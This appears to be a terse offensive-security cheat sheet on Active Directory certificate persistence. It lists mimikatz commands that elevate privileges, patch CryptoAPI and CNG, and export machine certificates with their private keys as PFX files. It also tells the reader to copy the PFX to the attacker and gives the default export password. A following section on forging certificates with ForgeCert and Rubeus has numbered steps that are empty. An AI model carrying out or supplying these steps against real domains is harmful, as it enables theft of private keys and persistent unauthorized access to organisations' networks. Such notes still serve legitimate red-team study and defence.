AD CERTIFICATES PERSISTENCE
Tools: mimikatz, SharpDPAPI
Extract Private Key
1)
mimikatz2)
crypto::certificates /systemstore:LOCAL_MACHINE3)
privilege::debug4)
crypto::capi 5)
crypto::cng6)
crypto::certificates /systemstore:LOCAL_MACHINE /exportExported Certificates format: PFX and DER
7) Download/copy .pfx file to attacker, then SCP to low-privileged user's home directory (Default key pass: mimikatz)
Generate our own certificate
Tools: Forgecert, Rubeus, Mimikatz
8)
9)
10)
11)
12)
Last updated